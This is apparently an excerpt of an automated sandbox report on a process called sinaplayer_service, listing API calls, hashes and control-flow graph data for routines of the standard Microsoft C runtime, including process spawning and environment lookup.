                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: dea5b091f72f7a48e888e6ccef4a73393b70c24eab73c1da3d0af656f801356b
                                                                                                                                                                                                    • Instruction ID: 9a9897f82d0fd89de33087bd0aed1afb20a8cc6e3404ed40cae26a4dbc1ebba7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dea5b091f72f7a48e888e6ccef4a73393b70c24eab73c1da3d0af656f801356b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6031AD79B54306ABEB458F38C88179E73A6EFAD750F209026E514CF250E770C8519796
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,00000080,00000000,00000000,?,00000000,?,?,?,?,6D0A1B76,00000080,?,00000080,?,?), ref: 6D0A1A9B
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,00000080,00000000,00000000,00000080,?,?,?,00000080,?,?,00000000), ref: 6D0A1AFF
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,?,?,00000080,?,?,?), ref: 6D0A1B23
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,?,00000080,?,?,?,00000080,?,?,00000000), ref: 6D0A1B2C
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000080,?,?,?,00000080,?,?,00000000), ref: 6D0E010F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale__crt$ByteCharMultiWide_freea_smalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3955243501-0
                                                                                                                                                                                                    • Opcode ID: 181ff27066d5e201a53e6e97cbdcfec401f700ee7d82746ef4a0608b9cb50e74
                                                                                                                                                                                                    • Instruction ID: 47aff35db858320e622a6c5475efe8df073de7ecc6ec6375608acbf528f83dd5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 181ff27066d5e201a53e6e97cbdcfec401f700ee7d82746ef4a0608b9cb50e74
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7210432914116ABFF118FD5DC40FAF7BE9EB86760B58415AFD1897212EB31C810C7A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000244,?,6D0FC48E,6D163B90,00000000), ref: 6D0FC39C
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,00000000,?,6D0FC48E,6D163B90,00000000), ref: 6D0FC3BD
                                                                                                                                                                                                    • FindFirstFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,6D0FC48E,6D163B90,00000000), ref: 6D0FC3D6
                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,6D0FC48E,6D163B90,00000000), ref: 6D0FC3FD
                                                                                                                                                                                                    • FindClose.KERNEL32(?,6D0FC48E,6D163B90,00000000), ref: 6D0FC40D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$CloseFile$FirstNext_malloc_crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1203757345-0
                                                                                                                                                                                                    • Opcode ID: 75a1c4990817e160ced78af9f4c5cfdabff23c6e7aa8925ab8098083ac04f615
                                                                                                                                                                                                    • Instruction ID: b7960de8b5443b053e347f23c937d1579c5fea9f51193df926bb2440eb86ee43
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75a1c4990817e160ced78af9f4c5cfdabff23c6e7aa8925ab8098083ac04f615
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC0108351052A5AFEF118FA5F989B763BB8FF073A5B68011AFC0889250DBB08453DA94

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1415 6d105c14-6d105c44 call 6d08ed7e 1418 6d105c46-6d105c51 _errno call 6d124670 1415->1418 1419 6d105c5d-6d105c69 1415->1419 1423 6d105c56-6d105c58 1418->1423 1421 6d105c6b 1419->1421 1422 6d105c6e-6d105c71 1419->1422 1421->1418 1424 6d105c73-6d105c77 1422->1424 1425 6d105c6d 1422->1425 1426 6d106105-6d10610a call 6d08edc3 1423->1426 1427 6d105c79-6d105c7b 1424->1427 1428 6d105c7d 1424->1428 1425->1422 1427->1418 1427->1428 1430 6d105c80-6d105c84 1428->1430 1430->1430 1432 6d105c86-6d105c8a 1430->1432 1433 6d105c94-6d105c99 1432->1433 1434 6d105c8c-6d105c8e 1432->1434 1435 6d105ca2-6d105ca4 1433->1435 1436 6d105c9b-6d105ca0 1433->1436 1434->1433 1437 6d105c90-6d105c92 1434->1437 1438 6d105cab-6d105cc6 call 6d121d74 1435->1438 1439 6d105ca6 1435->1439 1436->1438 1437->1418 1437->1433 1442 6d106103 1438->1442 1443 6d105ccc-6d105cd2 1438->1443 1439->1438 1442->1426 1444 6d105cd4-6d105cdd 1443->1444 1445 6d105cdf-6d105ce5 1443->1445 1446 6d105ce8-6d105cf5 call 6d0945f8 1444->1446 1445->1446 1449 6d105cf7-6d105d09 call 6d094ea2 * 2 1446->1449 1450 6d105d0e-6d105d53 call 6d08edd7 GetCurrentProcess DuplicateHandle 1446->1450 1449->1423 1456 6d1060d2 1450->1456 1457 6d105d59-6d105d81 call 6d094ea2 _fdopen 1450->1457 1459 6d1060d5-6d1060da 1456->1459 1457->1456 1465 6d105d87-6d105d94 call 6d10613c 1457->1465 1461 6d1060e6-6d1060eb 1459->1461 1462 6d1060dc-6d1060e5 call 6d094ea2 1459->1462 1466 6d1060f7-6d1060fe call 6d10610e 1461->1466 1467 6d1060ed-6d1060f6 call 6d094ea2 1461->1467 1462->1461 1474 6d105d9a-6d105db0 __wdupenv_s 1465->1474 1475 6d1060bc-6d1060d0 call 6d094f9e 1465->1475 1466->1442 1467->1466 1477 6d105db2-6d105db5 1474->1477 1478 6d105dc5-6d105dcd 1474->1478 1475->1459 1482 6d105dc1-6d105dc3 1477->1482 1483 6d105db7-6d105dbc call 6d12469b 
1477->1483 1479 6d105dd7-6d105e04 call 6d091533 1478->1479 1480 6d105dcf-6d105dd4 1478->1480 1487 6d105e06-6d105e0c 1479->1487 1488 6d105e0e-6d105e13 1479->1488 1480->1479 1482->1478 1482->1480 1483->1482 1489 6d105e16-6d105e1e 1487->1489 1488->1489 1490 6d105e20 1489->1490 1491 6d105e23-6d105e65 call 6d0929af * 3 _calloc_crt 1489->1491 1490->1491 1498 6d1060b9 1491->1498 1499 6d105e6b-6d105e7c call 6d0947cd 1491->1499 1498->1475 1502 6d105e82-6d105e95 call 6d0ae676 1499->1502 1503 6d105f56-6d105f58 1499->1503 1502->1503 1507 6d105e9b-6d105eac call 6d0ae676 1502->1507 1506 6d105f62-6d105f64 1503->1506 1508 6d105f66-6d105f85 call 6d08ece0 * 4 1506->1508 1509 6d105f87 1506->1509 1507->1503 1519 6d105eb2-6d105ed7 call 6d091533 _errno call 6d0fe270 1507->1519 1550 6d105f2b-6d105f35 _errno 1508->1550 1511 6d105f8a-6d105f9e __getpath 1509->1511 1514 6d106064-6d106074 call 6d08ece0 * 2 1511->1514 1515 6d105fa4-6d105fa7 1511->1515 1536 6d106077-6d106094 call 6d08ece0 * 2 CloseHandle 1514->1536 1515->1514 1520 6d105fad-6d105fbd call 6d0929af 1515->1520 1543 6d105ed9-6d105ef8 CreateProcessA 1519->1543 1544 6d105efd-6d105f12 _calloc_crt 1519->1544 1532 6d105fc3-6d105fcd call 6d10e5b2 1520->1532 1533 6d10604f-6d106051 1520->1533 1534 6d105fcf 1532->1534 1533->1534 1539 6d105fd1-6d105fe6 call 6d0ae676 1534->1539 1540 6d105fec-6d106007 call 6d0929af * 2 1534->1540 1562 6d106096-6d106099 CloseHandle 1536->1562 1563 6d10609b-6d1060aa _errno 1536->1563 1539->1503 1539->1540 1565 6d106061 1540->1565 1566 6d106009-6d106018 call 6d0ae676 1540->1566 1543->1536 1546 6d105f14-6d105f28 call 6d08ece0 * 3 1544->1546 1547 6d105f3a-6d105f4f __wdupenv_s 1544->1547 1546->1550 1547->1509 1555 6d105f51-6d105f54 1547->1555 1550->1498 1555->1503 1555->1506 1562->1563 1567 6d1060b6 1563->1567 1568 6d1060ac-6d1060b4 1563->1568 1565->1514 1566->1503 1573 6d10601e-6d10602b call 6d0fe270 1566->1573 1567->1498 1568->1466 1576 6d106056-6d10605c 1573->1576 1577 6d10602d-6d10604d CreateProcessA 1573->1577 
1576->1511 1577->1514
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D106120,0000009C), ref: 6D105C46
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D106120,0000009C), ref: 6D105C51
                                                                                                                                                                                                    • __pipe.LIBCMT(?,00000400,00000000,6D106120,0000009C), ref: 6D105CBB
                                                                                                                                                                                                    • _close.MSVCR120(?,?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105CFA
                                                                                                                                                                                                    • _close.MSVCR120(?,?,?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105D02
                                                                                                                                                                                                    • _lock.MSVCR120(00000009,?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105D10
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105D1F
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000002,?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105D4B
                                                                                                                                                                                                    • _close.MSVCR120(?,?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105D5D
                                                                                                                                                                                                    • _fdopen.MSVCR120(?,00000077,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D105D72
                                                                                                                                                                                                    • _idtab.LIBCMT ref: 6D105D89
                                                                                                                                                                                                    • __wdupenv_s.LIBCMT(?,00000000,COMSPEC), ref: 6D105DA6
                                                                                                                                                                                                      • Part of subcall function 6D125072: _lock.MSVCR120(00000007,6D125150,00000010,6D0FF6AB,00000000,00000000,00000000,?,00000000,?,?,?,6D0FFF5D,00000000,00000000,00000000), ref: 6D125085
                                                                                                                                                                                                      • Part of subcall function 6D125072: _errno.MSVCR120(6D125150,00000010,6D0FF6AB,00000000,00000000,00000000,?,00000000,?,?,?,6D0FFF5D,00000000,00000000,00000000,00000000), ref: 6D12509C
                                                                                                                                                                                                      • Part of subcall function 6D125072: _invalid_parameter_noinfo.MSVCR120(6D125150,00000010,6D0FF6AB,00000000,00000000,00000000,?,00000000,?,?,?,6D0FFF5D,00000000,00000000,00000000,00000000), ref: 6D1250A6
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D105DBC
                                                                                                                                                                                                      • Part of subcall function 6D12469B: IsProcessorFeaturePresent.KERNEL32(00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000,00000000,00000000,00000000,6D0FB412), ref: 6D12469D
                                                                                                                                                                                                      • Part of subcall function 6D12469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000), ref: 6D1246BC
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,00000044), ref: 6D105DE4
                                                                                                                                                                                                    • strlen.MSVCR120(?), ref: 6D105E33
                                                                                                                                                                                                    • strlen.MSVCR120(?,?), ref: 6D105E3D
                                                                                                                                                                                                    • strlen.MSVCR120( /c ,?,?), ref: 6D105E49
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000000,00000001, /c ,?,?), ref: 6D105E56
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,?,?), ref: 6D105E72
                                                                                                                                                                                                    • strcat_s.MSVCR120(00000000,?, /c ), ref: 6D105E8B
                                                                                                                                                                                                    • strcat_s.MSVCR120(00000000,?,?), ref: 6D105EA2
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,00000010), ref: 6D105EB9
                                                                                                                                                                                                    • _errno.MSVCR120(?,00000000,00000010), ref: 6D105EBE
                                                                                                                                                                                                    • __access_s.LIBCMT(?,00000000,?,00000000,00000010), ref: 6D105ECD
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 6D105EF0
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000104,00000001), ref: 6D105F07
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000000), ref: 6D105F1B
                                                                                                                                                                                                    • free.MSVCR120(?,00000000,00000000), ref: 6D105F23
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D105F2B
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D105F15
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • __wdupenv_s.LIBCMT(00000000,00000000,PATH), ref: 6D105F45
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D106078
                                                                                                                                                                                                    • free.MSVCR120(?,00000000), ref: 6D106080
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6D106090
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6D106099
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10609B
                                                                                                                                                                                                    • fclose.MSVCR120(00000000), ref: 6D1060BD
                                                                                                                                                                                                    • _close.MSVCR120(?), ref: 6D1060E0
                                                                                                                                                                                                    • _close.MSVCR120(?), ref: 6D1060F1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _close_errnofree$HandleProcessstrlen$Close__wdupenv_s_calloc_crt_invalid_parameter_noinfo_lockmemsetstrcat_s$CreateCurrentDuplicateFeatureFreeHeapPresentProcessorTerminate__access_s__crt__pipe_fdopen_idtab_invoke_watsonfclosestrcpy_s
                                                                                                                                                                                                    • String ID: /c $COMSPEC$PATH$cmd.exe$w$l\
                                                                                                                                                                                                    • API String ID: 1434950611-2188043720
                                                                                                                                                                                                    • Opcode ID: 9037358168b627029ab14fa7428e55c9eb3a012f1c89a55bf77343728cd3ad32
                                                                                                                                                                                                    • Instruction ID: 506e72b083c8717d50dc4ea9f0bc8706f1a7daa761f7e59b3695dcefc25c7f0d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9037358168b627029ab14fa7428e55c9eb3a012f1c89a55bf77343728cd3ad32
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FE10771D0421AABFF11AFA4DC40BFE7BB8AF1A354F114029FA14E7149EFB189418B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,.im,00000006,?,?,?,?,?,6D0A6C5D), ref: 6D0A6B29
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 6D0A6B3D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 6D0A6B48
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx,?,?,?,?,?,6D0A6C5D), ref: 6D0A6B77
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0A6B7E
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6D0A6C5D), ref: 6D0A6B9C
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6D0A6C5D), ref: 6D0D1FEB
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2007
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2015
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D201B
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2031
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D203F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2045
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D205B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2069
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D206F
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow$AddressProc$HandleModuleVersion@$Concurrency@@Manager@1@Resource
                                                                                                                                                                                                    • String ID: .im$GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$]lm$kernel32.dll
                                                                                                                                                                                                    • API String ID: 2361529535-95723099
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B216B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B2175
                                                                                                                                                                                                    • _wspawnve.MSVCR120(?,?,?,?), ref: 6D0B2186
                                                                                                                                                                                                      • Part of subcall function 6D0B2085: wcsrchr.MSVCR120(?,0000005C), ref: 6D0B20BB
                                                                                                                                                                                                      • Part of subcall function 6D0B2085: wcsrchr.MSVCR120(?,0000002F,?,0000005C), ref: 6D0B20C5
                                                                                                                                                                                                      • Part of subcall function 6D0B2085: wcsrchr.MSVCR120(00000000,0000002E), ref: 6D0B20E4
                                                                                                                                                                                                      • Part of subcall function 6D0B2085: _waccess_s.MSVCR120(?,00000000), ref: 6D0B20F6
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B219C
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B21A7
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B21CC
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4D25
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D4D30
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D4D43
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4D50
                                                                                                                                                                                                    • wcschr.MSVCR120(?,0000002F), ref: 6D0D4D63
                                                                                                                                                                                                    • _wdupenv_s.MSVCR120(?,00000000,PATH), ref: 6D0D4D7C
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000104,00000002), ref: 6D0D4DA6
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000), ref: 6D0D4DD1
                                                                                                                                                                                                    • wcscat_s.MSVCR120(00000000,00000104,6D0E218C), ref: 6D0D4DF9
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000), ref: 6D0D4E0A
                                                                                                                                                                                                    • wcslen.MSVCR120(?,00000000), ref: 6D0D4E12
                                                                                                                                                                                                    • wcscat_s.MSVCR120(00000000,00000104,?), ref: 6D0D4E2B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4E3B
                                                                                                                                                                                                    • _wspawnve.MSVCR120(?,00000000,?,?), ref: 6D0D4E4E
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4E64
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D4E6E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$wcslenwcsrchr$_invalid_parameter_noinfo_wspawnvewcscat_s$__doserrno_calloc_crt_waccess_s_wdupenv_swcschr
                                                                                                                                                                                                    • String ID: PATH
                                                                                                                                                                                                    • API String ID: 2749365969-1036084923
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(?,00007FFF,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0B0FF0
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(?,00007FFF,?,00007FFF,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0B0FFA
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(-00000002,00000002), ref: 6D0B1021
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,?,?), ref: 6D0B1038
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6D0B108E
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6D0B10AD
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000000,00000001), ref: 6D0B10BD
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6D0B10DC
                                                                                                                                                                                                    • strlen.MSVCR120(?), ref: 6D0B10ED
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 6D0B110B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B1133
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,?,?,00000000,?,?), ref: 6D0B1056
                                                                                                                                                                                                      • Part of subcall function 6D091693: _errno.MSVCR120(?,?,6D0FBEB4,6D163568,00000314,Runtime Error!Program: ,?,?,?), ref: 6D0916D5
                                                                                                                                                                                                      • Part of subcall function 6D091693: _invalid_parameter_noinfo.MSVCR120(?,?,6D0FBEB4,6D163568,00000314,Runtime Error!Program: ,?,?,?), ref: 6D0D634D
                                                                                                                                                                                                      • Part of subcall function 6D0B120C: wcschr.MSVCR120(?,0000003D,00000000,?,005C2A20), ref: 6D0B1232
                                                                                                                                                                                                      • Part of subcall function 6D0B120C: free.MSVCR120(?,00000000,?,005C2A20), ref: 6D0B1296
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD29
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD34
                                                                                                                                                                                                    • wcschr.MSVCR120(?,0000003D,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD46
